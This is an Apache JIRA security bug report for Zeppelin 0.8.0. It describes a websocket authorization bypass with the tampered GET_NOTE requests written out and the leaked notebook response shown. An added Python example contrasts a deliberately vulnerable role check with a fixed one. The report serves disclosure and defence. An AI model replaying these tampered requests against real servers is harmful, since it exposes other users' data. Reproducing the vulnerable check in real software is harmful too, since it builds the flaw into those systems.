Akhil S Naik created ZEPPELIN-3906:
--------------------------------------

             Summary: [security]Zeppelin Notebooks can be accessed by 
unauthorized Users
                 Key: ZEPPELIN-3906
                 URL: https://issues.apache.org/jira/browse/ZEPPELIN-3906
             Project: Zeppelin
          Issue Type: Bug
          Components: zeppelin-server
    Affects Versions: 0.8.0
         Environment: Easily reproducible in Zeppelin 0.8 with the Simple 
Web Socket Client Chrome extension

            Reporter: Akhil S Naik
         Attachments: Screen Shot 2018-12-13 at 9.58.21 AM.png

Zeppelin notebook role access can be easily bypassed, allowing us to access 
other users' notebooks.

The exploit is achieved using web sockets: Zeppelin's web socket handler fails 
to validate whether the role of the active session making the request is 
allowed to access another user's note/data. The Zeppelin web socket requests 
can be intercepted by a malicious authenticated user and the role value 
modified, enabling access to the other user's jobs/results.

Reproduction Steps:
The following is required to reproduce this finding:

1) Authenticate to the Zeppelin service as user1, since a valid "ticket" value 
is required by the web socket request.
(Assume I logged in as akhil/akhil using Zeppelin's basic authentication method.)

2) Open the 'Simple Web Socket Client' Chrome extension (or use any 
intercepting tool such as Burp).

3) Open a random notebook. We can see the Zeppelin web client sending the 
request:

{code:java}
{"op":"GET_NOTE","data":{"id":"2DWPTEZCW"},"principal":"admin","ticket":"de3a1427-6931-402d-9b31-2ca2797dcea5","roles":"[admin]"}
{code}

4) Modify the above request: add a note ID that the admin role does not have 
access to, and edit the role to:

{code:java}
{"op":"GET_NOTE","data":{"id":"2DZETETMP"},"principal":"admin","ticket":"de3a1427-6931-402d-9b31-2ca2797dcea5","roles":"[akhil]"}
{code}

5) See the response from the web socket:

{code:java}
{"op":"GET_NOTE","data":{"id":"2DZETETMP"},"principal":"admin","ticket":"de3a1427-6931-402d-9b31-2ca2797dcea5","roles":"[akhil]"}
{"op":"NOTE","data":{"note":{"paragraphs":[{"text":"whoami","user":"akhil","dateUpdated":"2018-12-12T03:27:52+0000","config":{"colWidth":12.0,"enabled":true,"results":{},"editorSetting":{"editOnDblClick":false,"language":"sh"},"editorMode":"ace/mode/sh"},"settings":{"params":{},"forms":{}},"results":{"code":"SUCCESS","msg":[{"type":"TEXT","data":"zeppelin\n"}]},"apps":[],"jobName":"paragraph_1544585263373_-927336176","id":"20181212-032743_583387567","dateCreated":"2018-12-12T03:27:43+0000","dateStarted":"2018-12-12T03:27:52+0000","dateFinished":"2018-12-12T03:27:53+0000","status":"FINISHED","progressUpdateIntervalMs":500},{"user":"akhil","config":{},"settings":{"params":{},"forms":{}},"apps":[],"jobName":"paragraph_1544585272646_-198606435","id":"20181212-032752_1799562836","dateCreated":"2018-12-12T03:27:52+0000","status":"READY","progressUpdateIntervalMs":500}],"name":"Akhil Note","id":"2DZETETMP","angularObjects":{"2CHS8UYQQ:shared_process":[],"2CK8A9MEG:shared_process":[],"2CKAY1A8Y:shared_process":[],"2CKEKWY8Z:shared_process":[]},"config":{"isZeppelinNotebookCronEnable":false},"info":{}}},"ticket":"anonymous","principal":"anonymous","roles":""}
{code}

We get the whole contents of the notebook even though the JSESSIONID and 
ticket are authenticated as admin, and admin does not have access to notebook 
2DZETETMP.




--
This message was sent by Atlassian JIRA
(v7.6.3#76005)
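An added example, not code from Zeppelin or from the reporter, showing in Python the distinction the report turns on: the GET_NOTE handler described above believes the principal and roles the client places in the message, whereas the check has to derive the subject from the server-side session that the ticket identifies. The note ACL (NOTE_READERS), the session table (SESSIONS), the function names and the third message that also rewrites the principal are assumptions made for this example; the note ids, principal, ticket and roles values are the ones from the report.

```python
# Added example, not Zeppelin's code. Demonstrates why a websocket handler
# must not trust client-supplied "principal"/"roles" fields for authorisation.

# Constructed for this example: which subjects (principal or role) may read
# each note. The note ids are the two from the report.
NOTE_READERS = {
    "2DWPTEZCW": {"admin"},
    "2DZETETMP": {"akhil"},
}

TICKET = "de3a1427-6931-402d-9b31-2ca2797dcea5"  # ticket value from the report

# Constructed for this example: the server-side session table keyed by login
# ticket. The server is assumed to record principal and roles at login time.
SESSIONS = {
    TICKET: {"principal": "admin", "roles": {"admin"}},
}


def parse_roles(roles_field):
    """Parse the client 'roles' field; on the wire it is the string "[admin]"."""
    if isinstance(roles_field, (list, set, tuple)):
        return set(roles_field)
    text = str(roles_field).strip()
    if text.startswith("[") and text.endswith("]"):
        text = text[1:-1]
    return {r.strip() for r in text.split(",") if r.strip()}


def can_read_vulnerable(msg):
    """Authorisation as the report describes it: the handler believes the
    principal and roles carried in the message, so any authenticated user can
    claim a role and read the corresponding notes."""
    note_id = msg["data"]["id"]
    subjects = {msg.get("principal")} | parse_roles(msg.get("roles", ""))
    return bool(subjects & NOTE_READERS.get(note_id, set()))


def can_read_fixed(msg):
    """Hardened check: the subject comes from the server-side session the
    ticket identifies; principal/roles in the message are never trusted."""
    session = SESSIONS.get(msg.get("ticket"))
    if session is None:
        return False  # no valid login ticket
    if msg.get("principal") != session["principal"]:
        return False  # client claims a different principal than it logged in as
    note_id = msg["data"]["id"]
    subjects = {session["principal"]} | session["roles"]
    return bool(subjects & NOTE_READERS.get(note_id, set()))


def get_note_message(note_id, principal, roles, ticket=TICKET):
    """Build a GET_NOTE message with the field layout seen in the report."""
    return {"op": "GET_NOTE", "data": {"id": note_id},
            "principal": principal, "ticket": ticket, "roles": roles}


# The legitimate request and the tampered request from the report, plus a
# constructed variant in which the attacker also rewrites the principal.
ORIGINAL = get_note_message("2DWPTEZCW", "admin", "[admin]")
TAMPERED_ROLES = get_note_message("2DZETETMP", "admin", "[akhil]")
TAMPERED_PRINCIPAL = get_note_message("2DZETETMP", "akhil", "[akhil]")


def evaluate(msg):
    """Return (vulnerable_decision, fixed_decision) for one message."""
    return can_read_vulnerable(msg), can_read_fixed(msg)


if __name__ == "__main__":
    for name, msg in [("original", ORIGINAL),
                      ("tampered roles", TAMPERED_ROLES),
                      ("tampered principal", TAMPERED_PRINCIPAL)]:
        vulnerable, fixed = evaluate(msg)
        print(f"{name:20s} vulnerable={vulnerable} fixed={fixed}")
```

The fixed check also rejects a message whose principal disagrees with the session behind the ticket rather than picking one of the two, so a mismatch is treated as tampering instead of being silently resolved.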
